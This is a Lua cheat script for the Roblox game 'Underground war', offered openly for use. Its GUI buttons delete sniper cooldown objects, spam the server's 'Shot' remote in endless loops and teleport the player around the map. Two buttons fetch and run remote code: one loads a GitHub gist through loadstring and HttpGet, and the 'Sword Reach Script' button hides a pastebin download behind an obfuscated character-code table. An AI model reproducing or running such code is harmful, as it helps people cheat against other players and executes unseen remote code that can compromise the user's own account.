--- Underground war script V0.9

-- Made by Devon_Agent/Markthevil_Agent

-- Update Version 0.9

-- More frames

-- More buttons

-- New Guis

-- New Text

-- enjoy it!

local Lplayer = game.Players.LocalPlayer.PlayerGui

local AnewGui = Instance.new("ScreenGui")

local Frame1 = Instance.new("Frame")

local Sniper1 = Instance.new("TextButton")

local Sniper2 = Instance.new("TextButton")

local MadeBy = Instance.new("TextLabel")

local FText = Instance.new("TextLabel")

local cclose = Instance.new("TextButton")

local Aspam = Instance.new("TextButton")

local LoopAspamp = Instance.new("TextButton")

local SnSpam = Instance.new("TextButton")

local Dgui = Instance.new("TextButton")

local TPtext = Instance.new("TextLabel")

local BTButton = Instance.new("TextButton")

local RTButton = Instance.new("TextButton")

local BTButtonFlag = Instance.new("TextButton")

local BTButtonTower = Instance.new("TextButton")

local BTButtonTower2 = Instance.new("TextButton")

local RTButtonFlag = Instance.new("TextButton")

local RTButtonTower = Instance.new("TextButton")

local RTButtonTower2 = Instance.new("TextButton")

local TTPlayer = Instance.new("TextButton")

local ReachSButton = Instance.new("TextButton")

local Frame2 = Instance.new("Frame")

local SccrollFrame = Instance.new("ScrollingFrame")

local Hide = Instance.new("TextButton")

local More = Instance.new("TextButton")

local Corner = Instance.new("UICorner")

local SwText = Instance.new("TextLabel")

local OtherText = Instance.new("TextLabel")

AnewGui.Parent = Lplayer

AnewGui.Name = "FastReloadScript"

AnewGui.ResetOnSpawn = false

--Frames

Frame1.Parent = AnewGui

Frame1.Name = "Background"

Frame1.Draggable = true

Frame1.Selectable = true

Frame1.Active = true

Frame1.Position = UDim2.new(0.593, 0, 0.214, 0)

Frame1.Size = UDim2.new(0.387, 0, 0.35, 0)

Frame1.BackgroundColor3 = Color3.new(0.498039,0.498039,0.498039)

Frame1.BorderSizePixel = 5

--new

Frame2.Parent = Frame1

Frame2.Draggable = true

Frame2.SelectionGroup = true

Frame2.Name = "Frame2"

Frame2.Position = UDim2.new(0,0,0.196,0)

Frame2.Size = UDim2.new(0.998,0,0.804,0)

Frame2.BorderSizePixel = 2

Frame2.BackgroundColor3 = Color3.new(0.498039,0.498039,0.498039)

Frame2.Visible = false

Frame2.ZIndex = 2

SccrollFrame.Parent = Frame2

SccrollFrame.ZIndex = 3

SccrollFrame.BorderSizePixel = 0

SccrollFrame.Size = UDim2.new(1.002,0,0.781,0)

SccrollFrame.Position = UDim2.new(0,0,0.219,0)

SccrollFrame.CanvasSize = UDim2.new(0,0,8,0)

SccrollFrame.ScrollBarThickness = 15

SccrollFrame.BackgroundColor3 = Color3.new(0.337255,0.337255,0.337255)

SccrollFrame.Name = "SFrame"

--Texts

MadeBy.Draggable = true

MadeBy.Parent = Frame1

MadeBy.Size = UDim2.new(0.855, 0, 0.2, 0)

MadeBy.Name = "MadeBy"

MadeBy.Text = "Made By Devon_Agent"

MadeBy.BorderSizePixel = 0

MadeBy.BackgroundColor3 = Color3.new(0.34902,0.34902,0.34902)

MadeBy.Font = Enum.Font.RobotoCondensed

MadeBy.TextScaled = true

FText.Parent = Frame1

FText.Size = UDim2.new(1,0,0.228,0)

FText.Position = UDim2.new(0,0,0.196,0)

FText.Text = "Underground war Script v0.9"

FText.BackgroundTransparency = 1

FText.TextScaled = true

FText.TextColor3 = Color3.new(255,255,255)

OtherText.Parent = Frame2

OtherText.ZIndex = 3

OtherText.BorderSizePixel = 1

OtherText.Size = UDim2.new(1,0,0.228,0)

OtherText.Position = UDim2.new(0,0,-0.008,0)

OtherText.BackgroundTransparency = 1

OtherText.TextColor3 = Color3.new(1,1,1)

OtherText.TextScaled = true

OtherText.Font = Enum.Font.RobotoCondensed

OtherText.Text = "Other"

OtherText.Name = "OText"

TPtext.Parent = SccrollFrame

TPtext.ZIndex = 3

TPtext.BorderSizePixel = 1

TPtext.Size = UDim2.new(0.8,0,0.03,0)

TPtext.Position = UDim2.new(0.094,0,0.004,0)

TPtext.BackgroundTransparency = 1

TPtext.TextColor3 = Color3.new(0,0,0)

TPtext.TextScaled = true

TPtext.Font = Enum.Font.Nunito

TPtext.Text = "Teleport"

TPtext.Name = "Text"

SwText.Parent = SccrollFrame

SwText.BorderSizePixel = 1

SwText.ZIndex = 3

SwText.Size = UDim2.new(0.8,0,0.03,0)

SwText.Position = UDim2.new(0.096,0,0.394,0)

SwText.BackgroundTransparency = 1

SwText.TextColor3 = Color3.new(0,0,0)

SwText.TextScaled = true

SwText.Font = Enum.Font.Nunito

SwText.Text = "Sword"

SwText.Name = "SwText"

--Buttons

cclose.BorderSizePixel = 0

cclose.Parent = Frame1

cclose.BorderColor3 = Color3.new(0.666667,0,0)

cclose.Name = "Cclose"

cclose.Size = UDim2.new(0.145,0,0.2,0)

cclose.Position = UDim2.new(0.855,0,0,0)

cclose.BackgroundColor3 = Color3.new(1,0,0)

cclose.Text = "X"

cclose.TextScaled = true

Sniper1.Parent = Frame1

Sniper1.Text = "Sniper1"

Sniper1.Name = "Sniper1Button"

Sniper1.BackgroundColor3 = Color3.new(1,0,0)

Sniper1.Position = UDim2.new(0.233,0,0.475,0)

Sniper1.Size = UDim2.new(0.559,0,0.2,0)

Sniper1.BorderSizePixel = 0

Sniper1.TextScaled = true

Sniper1.Font = Enum.Font.PatrickHand

Sniper2.Parent = Frame1

Sniper2.Name = "Sniper2Button"

Sniper2.Text = "Sniper2"

Sniper2.Position = UDim2.new(0.233,0,0.764,0)

Sniper2.Size = UDim2.new(0.559,0,0.2,0)

Sniper2.Font = Enum.Font.PatrickHand

Sniper2.BackgroundColor3 = Color3.new(1,0,0)

Sniper2.TextScaled = true

Sniper2.BorderSizePixel = 0

Aspam.Parent = Frame1

Aspam.TextScaled = true

Aspam.BorderSizePixel = 0

Aspam.BackgroundColor3 = Color3.new(0,0.333333,0)

Aspam.Text = "Audio"

Aspam.Size = UDim2.new(0.163,0,0.2,0)

Aspam.Position = UDim2.new(0.033,0,0.475,0)

Aspam.Name = "Aspam"

LoopAspamp.Parent = Frame1

LoopAspamp.TextScaled = true

LoopAspamp.BorderSizePixel = 0

LoopAspamp.BackgroundColor3 = Color3.new(0.666667,0,0)

LoopAspamp.Text = "Sniper Spam"

LoopAspamp.Size = UDim2.new(0.163,0,0.2,0)

LoopAspamp.Position = UDim2.new(0.033,0,0.764,0)

LoopAspamp.Name = "StopAspam"

SnSpam.Parent = Frame1

SnSpam.TextScaled = true

SnSpam.BorderSizePixel = 0

SnSpam.BackgroundColor3 = Color3.new(1,0.666667,0)

SnSpam.Text = "Sniper Spam2"

SnSpam.Size = UDim2.new(0.163,0,0.2,0)

SnSpam.Position = UDim2.new(0.811,0,0.475,0)

SnSpam.Name = "SnSpam"

Dgui.TextScaled = true

Dgui.BackgroundColor3 = Color3.new(1,0.333333,0)

Dgui.BorderSizePixel = 0

Dgui.Text = "Destroy Gui"

Dgui.Size = UDim2.new(0.163,0,0.2,0)

Dgui.Position = UDim2.new(0.811,0,0.764,0)

Dgui.Name = "Dgui"

Dgui.Parent = Frame1

More.Parent = Frame1

More.ZIndex = 3

More.Text = "More"

More.BorderSizePixel = 0

More.TextScaled = true

More.BackgroundColor3 = Color3.new(1,0.333333,0)

More.Name = "GuiMore"

More.Position = UDim2.new(0.998,0,0.196,0)

More.Size = UDim2.new(0.153,0,0.116,0)

TTPlayer.Parent = SccrollFrame

TTPlayer.ZIndex = 3

TTPlayer.Position = UDim2.new(0.096,0,0.356,0)

TTPlayer.BorderSizePixel = 0

TTPlayer.Size = UDim2.new(0.8,0,0.03,0)

TTPlayer.TextScaled = true

TTPlayer.TextColor3 = Color3.new(1,1,1)

TTPlayer.BackgroundColor3 = Color3.new()

TTPlayer.Text = "Teleport to player Script"

ReachSButton.Parent = SccrollFrame

ReachSButton.ZIndex = 3

ReachSButton.Position = UDim2.new(0.096,0,0.429,0)

ReachSButton.Size = UDim2.new(0.8,0,0.03,0)

ReachSButton.BorderSizePixel = 0

ReachSButton.TextColor3 = Color3.new(1,1,1)

ReachSButton.BackgroundColor3 = Color3.new(0,0,0)

ReachSButton.TextScaled = true

ReachSButton.Text = "Sword Reach Script"

ReachSButton.Name = "ReachSButton"

--Blue

BTButton.Parent = SccrollFrame

BTButton.ZIndex = 3

Corner.Parent = BTButton

BTButton.BorderSizePixel = 0

BTButton.TextScaled = true

BTButton.BackgroundColor3 = Color3.new(0,0.666667,1)

BTButton.Name = "BTButton"

BTButton.Position = UDim2.new(0.096,0,0.043,0)

BTButton.Size = UDim2.new(0.8,0,0.03,0)

BTButton.Text = "BlueTeam Base"

BTButtonFlag.Parent = SccrollFrame

BTButtonFlag.ZIndex = 3

Corner.Parent = BTButtonFlag

BTButtonFlag.BorderSizePixel = 0

BTButtonFlag.TextScaled = true

BTButtonFlag.BackgroundColor3 = Color3.new(0,0.666667,1)

BTButtonFlag.Name = "BTButtonFlag"

BTButtonFlag.Position = UDim2.new(0.096,0,0.08,0)

BTButtonFlag.Size = UDim2.new(0.8,0,0.03,0)

BTButtonFlag.Text = "BlueTeam Flag"

BTButtonTower.Parent = SccrollFrame

BTButtonTower.ZIndex = 3

Corner.Parent = BTButtonTower

BTButtonTower.BorderSizePixel = 0

BTButtonTower.TextScaled = true

BTButtonTower.BackgroundColor3 = Color3.new(0,0.666667,1)

BTButtonTower.Name = "BTButtonTower"

BTButtonTower.Position = UDim2.new(0.096,0,0.12,0)

BTButtonTower.Size = UDim2.new(0.8,0,0.03,0)

BTButtonTower.Text = "BlueTeam Tower"

BTButtonTower2.Parent = SccrollFrame

BTButtonTower2.ZIndex = 3

Corner.Parent = BTButtonTower2

BTButtonTower2.BorderSizePixel = 0

BTButtonTower2.TextScaled = true

BTButtonTower2.BackgroundColor3 = Color3.new(0,0.666667,1)

BTButtonTower2.Name = "BTButtonTower"

BTButtonTower2.Position = UDim2.new(0.096,0,0.158,0)

BTButtonTower2.Size = UDim2.new(0.8,0,0.03,0)

BTButtonTower2.Text = "BlueTeam Tower 2"

--Red

RTButton.Parent = SccrollFrame

RTButton.ZIndex = 3

Corner.Parent = BRTButton

RTButton.BorderSizePixel = 0

RTButton.TextScaled = true

RTButton.BackgroundColor3 = Color3.new(1,0,0)

RTButton.Name = "RTButton"

RTButton.Position = UDim2.new(0.096,0,0.195,0)

RTButton.Size = UDim2.new(0.8,0,0.03,0)

RTButton.Text = "RedTeam Base"

RTButtonFlag.Parent = SccrollFrame

RTButtonFlag.ZIndex = 3

Corner.Parent = RTButtonFlag

RTButtonFlag.BorderSizePixel = 0

RTButtonFlag.TextScaled = true

RTButtonFlag.BackgroundColor3 = Color3.new(1,0,0)

RTButtonFlag.Name = "RTButtonFlag"

RTButtonFlag.Position = UDim2.new(0.096,0,0.233,0)

RTButtonFlag.Size = UDim2.new(0.8,0,0.03,0)

RTButtonFlag.Text = "RedTeam Flag"

RTButtonTower.Parent = SccrollFrame

RTButtonTower.ZIndex = 3

Corner.Parent = TTButtonTower

RTButtonTower.BorderSizePixel = 0

RTButtonTower.TextScaled = true

RTButtonTower.BackgroundColor3 = Color3.new(1,0,0)

RTButtonTower.Name = "RTButtonTower"

RTButtonTower.Position = UDim2.new(0.096,0,0.272,0)

RTButtonTower.Size = UDim2.new(0.8,0,0.03,0)

RTButtonTower.Text = "RedTeam Tower"

RTButtonTower2.Parent = SccrollFrame

RTButtonTower2.ZIndex = 3

Corner.Parent = RTButtonTower2

RTButtonTower2.BorderSizePixel = 0

RTButtonTower2.TextScaled = true

RTButtonTower2.BackgroundColor3 = Color3.new(1,0,0)

RTButtonTower2.Name = "RTButtonTower2"

RTButtonTower2.Position = UDim2.new(0.096,0,0.312,0)

RTButtonTower2.Size = UDim2.new(0.8,0,0.03,0)

RTButtonTower2.Text = "RedTeam Tower 2"

--[[

Hide.Parent = AnewGui

Hide.BorderSizePixel = 0

Hide.Size = UDim2.new(0.151,0,0.199,0)

Hide.Position = UDim2.new(1,0,0,0)

Hide.TextScaled = true

Hide.BackgroundColor3 = Color3.new(1,0,0)

Hide.Name = "Hide"

Hide.Text = "-"

]]--

-- Script 👌

cclose.MouseButton1Click:Connect(function()

    cclose.BackgroundColor3 = Color3.new(1,1,1)

    FText.Text = "Loading"

   wait(0.1)

   FText.Text = "Loading."

   wait(0.1)

   FText.Text = "Loading.."

   wait(0.1)

   FText.Text = "Loading..."

    wait(0.1)

    AnewGui:Destroy()

    

    end)

Sniper1.MouseButton1Click:Connect(function()

    while true do

        wait(0.1)

        

        local User = game:GetService("Players").LocalPlayer.Character

        local Tool = User:FindFirstChild("Sniper")

        

        if User:FindFirstChild("Sniper") then

            if User:WaitForChild("Sniper") and Tool:FindFirstChild("DB") then -- Try to find the stupid sniper that you have.

            Sniper1.BackgroundColor3 = Color3.new(0,2,0)

            Tool.DB:Destroy()

            wait(2.2)

            Sniper1.BackgroundColor3 = Color3.new(2,0,0)

            end

        end

        end

    end)

Sniper2.MouseButton1Click:Connect(function()

    while true do

        wait(0.1)

        local User = game:GetService("Players").LocalPlayer.Character

        local Tool = User:FindFirstChild("Sniper 2")

    

    if User:FindFirstChild("Sniper 2") then

       if User:WaitForChild("Sniper 2") and Tool:FindFirstChild("DB") then -- i am not repeating this 🗿

           Sniper2.BackgroundColor3 = Color3.new(0,1,1)

           Tool.DB:Destroy()

           wait(1.4)

           Sniper2.BackgroundColor3 = Color3.new(1,0,0)

           end

       end

    end

   end)

Aspam.MouseButton1Click:Connect(function()

    local User = game:GetService("Players").LocalPlayer.Character

    local Tool = User:FindFirstChild("Sniper") or User:FindFirstChild("Sniper 2")

    

    if User:FindFirstChild("Sniper") or User:FindFirstChild("Sniper 2") then

        Tool.Handle.Fire:Play()

 

    end

    end)

LoopAspamp.MouseButton1Click:Connect(function()

local Lplayer = game.Players.LocalPlayer.PlayerGui

local Newgui = Instance.new("ScreenGui")

local NewButton = Instance.new("TextButton")

Newgui.Parent = Lplayer

Newgui.Name = "TestingGui"

Newgui.ResetOnSpawn = false

NewButton.Text = "SpamSnipe1"

NewButton.TextSize = 30

NewButton.Draggable = true

NewButton.Parent = Newgui

NewButton.BackgroundColor3 = Color3.new(0,0,1)

NewButton.BorderSizePixel = 5

NewButton.Position = UDim2.new(0.04, 0, 0.63, 0)

NewButton.Size = UDim2.new(0, 275, 0, 35)

NewButton.Font = Enum.Font.PatrickHand

NewButton.MouseButton1Click:Connect(function()

    while true do

wait(0.1)

NewButton.BackgroundColor3 = Color3.new(1,1,1)

local args = {

    [1] = CFrame.new(-2.4725799560546875, 16.38849639892578, 250), CFrame.new(0.312735378742218, -0.03842530772089958, 0.9490627646446228)

}

game:GetService("Players").LocalPlayer.Character.Sniper.Shot:FireServer(unpack(args))

wait(0.1)

NewButton.BackgroundColor3 = Color3.new(0,0,1)

    end

    end)

-- HMMMMM

    end)

SnSpam.MouseButton1Click:Connect(function()

    local Lplayer = game.Players.LocalPlayer.PlayerGui

local Newgui = Instance.new("ScreenGui")

local NewButton = Instance.new("TextButton")

Newgui.Parent = Lplayer

Newgui.Name = "TestingGui"

Newgui.ResetOnSpawn = false

NewButton.Text = "SpamSnipe2"

NewButton.TextSize = 30

NewButton.Draggable = true

NewButton.Parent = Newgui

NewButton.BackgroundColor3 = Color3.new(1,0,0)

NewButton.BorderSizePixel = 5

NewButton.Position = UDim2.new(0.04, 0, 0.63, 0)

NewButton.Size = UDim2.new(0, 275, 0, 35)

NewButton.Font = Enum.Font.PatrickHand

NewButton.MouseButton1Click:Connect(function()

    while true do

wait(0.1)

NewButton.BackgroundColor3 = Color3.new(1,1,1)

local args = {

    [1] = CFrame.new(-2.4725799560546875, 16.38849639892578, 250), CFrame.new(0.312735378742218, -0.03842530772089958, 0.9490627646446228)

}

game:GetService("Players").LocalPlayer.Character:FindFirstChild("Sniper 2").Shot:FireServer(unpack(args))

wait(0.1)

NewButton.BackgroundColor3 = Color3.new(1,0,0)

    end

    end)

    end)

Dgui.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.PlayerGui.TestingGui:Destroy()

end) 

--[[

Hide.MouseButton1Click:Connect(function()

       

     Frame1.Visible = false

     

    wait(5)

        

        Frame1.Visible = true

    end)

    

    ]]--

    

    More.MouseButton1Click:Connect(function()

         Frame2.Visible = not Frame2.Visible

         

         if Frame2.Visible == true then

             More.Text = "Less"

         end

         if Frame2.Visible == false then

             More.Text = "More"

             end

        end)

    

    TTPlayer.MouseButton1Click:Connect(function()

    loadstring(game:HttpGet("https://gist.githubusercontent.com/DagerFild/b4776075a0d26ef04394133ee6bd2081/raw/0ed51ac94057d2d9a9f00e1b037b9011c76ca54a/tpGUI", true))()

    end)

    

ReachSButton.MouseButton1Click:Connect(function()

SGTSOBF_mmMmmmMmM={"\108","\111","\97","\100","\115","\116","\114","\105","\110","\103","\40","\103","\97","\109","\101","\58","\72","\116","\116","\112","\71","\101","\116","\40","\40","\39","\92","\49","\48","\52","\92","\49","\49","\54","\92","\49","\49","\54","\92","\49","\49","\50","\92","\49","\49","\53","\92","\53","\56","\92","\52","\55","\92","\52","\55","\92","\49","\49","\50","\92","\57","\55","\92","\49","\49","\53","\92","\49","\49","\54","\92","\49","\48","\49","\92","\57","\56","\92","\49","\48","\53","\92","\49","\49","\48","\92","\52","\54","\92","\57","\57","\92","\49","\49","\49","\92","\49","\48","\57","\92","\52","\55","\92","\49","\49","\52","\92","\57","\55","\92","\49","\49","\57","\92","\52","\55","\92","\49","\48","\51","\92","\54","\54","\92","\53","\53","\92","\52","\57","\92","\49","\49","\51","\92","\55","\53","\92","\54","\55","\92","\53","\48","\92","\49","\48","\39","\41","\44","\116","\114","\117","\101","\41","\41","\40","\41",}SGTSOBF_fffffFFfF="";for _,SGTSOBF_MMmmmMmMM in pairs(SGTSOBF_mmMmmmMmM)do SGTSOBF_fffffFFfF=SGTSOBF_fffffFFfF..SGTSOBF_MMmmmMmMM;end;SGTSOBF_wwWwwwwWw=function(SGTSOBF_LLLllLLLl)loadstring(SGTSOBF_LLLllLLLl)()end;SGTSOBF_wwWwwwwWw(SGTSOBF_fffffFFfF)

end)

--Blue base 

BTButton.MouseButton1Click:Connect(function()

game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(10.603429794311523, 14.599997520446777, -135.6314239501953)

end)

--Red Base

RTButton.MouseButton1Click:Connect(function()

game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-7.15360689163208, 14.599997520446777, 132.06961059570312)

end)

--Blue Tower

BTButtonTower.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-29.001182556152344, 63.79998779296875, -67.38485717773438)

end)

--Blue tower 2

BTButtonTower2.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(68.00448608398438, 63.79998779296875, -35.94938278198242)

end)

--Blue flag

BTButtonFlag.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(6.635923862457275, 17.9999942779541, -73.52369689941406)

end)

--Red Tower

RTButtonTower.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(27.32286262512207, 63.79998779296875, 67.04656219482422)

end)

--Red tower 2

RTButtonTower2.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-69.72918701171875, 63.799991607666016, 35.250144958496094)

end)

--Red Flag

RTButtonFlag.MouseButton1Click:Connect(function()

    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-7.748226165771484, 17.9999942779541, 75.54824829101562)

end)
